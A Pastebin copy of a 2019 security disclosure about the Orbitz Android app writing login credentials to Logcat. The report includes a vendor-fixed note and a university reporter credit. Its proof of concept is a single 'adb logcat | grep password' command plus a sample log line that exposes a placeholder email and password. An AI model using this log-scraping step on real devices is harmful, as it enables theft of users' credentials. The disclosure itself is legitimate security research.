SHARE
TWEET

Security Bug in Orbitz Android App

friendlyjlee Sep 16th, 2019 (edited) 89 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit Title: Orbitz Android App - Username/Password Logging
  2. # Application: Orbitz
  3. # Version: 19.31.1
  4. # Software Link: https://play.google.com/store/apps/details?id=com.orbitz
  5. # Company: Orbitz
  6. # Installs: 1,000,000+
  7. # Impact: Looking at the output of Logcat, hackers can get username and password of Orbitz
  8. # Category: Mobile Apps
  9. # Tested on: Android 9
  10.  
  11. ---Description---
  12. Usernames and passwords are stored in the log during the authentication. So, hackers can obtain user password/ID of Orbitz, simply looking at Logcat. Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission.
  13.  
  14. ---Vendor feedback---
  15. After reporting, the vendor has quickly fixed this problem and released a new version.
  16.  
  17. ---PoC---
  18. 1. Try to login with Orbitz, entering username and password
  19.  
  20. 2. Search password in Logcat
  21. $ adb logcat | grep 'password'
  22. 08-06 18:31:28.036  6213  6294 D OkHttp  : email=myOrbizemail%40gmail.com&password=myOrbitPassword&staySignedIn=true&siteid=70201&langid=1033&sourceType=mobileapp&clientid=orbitz.app.android.phone%3A19.31.1
  23.  
  24. ---Reporter---
  25. Jaeho Lee(Jaeho.Lee@rice.edu)
  26. Rice Computer Security Lab
  27. Rice University
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top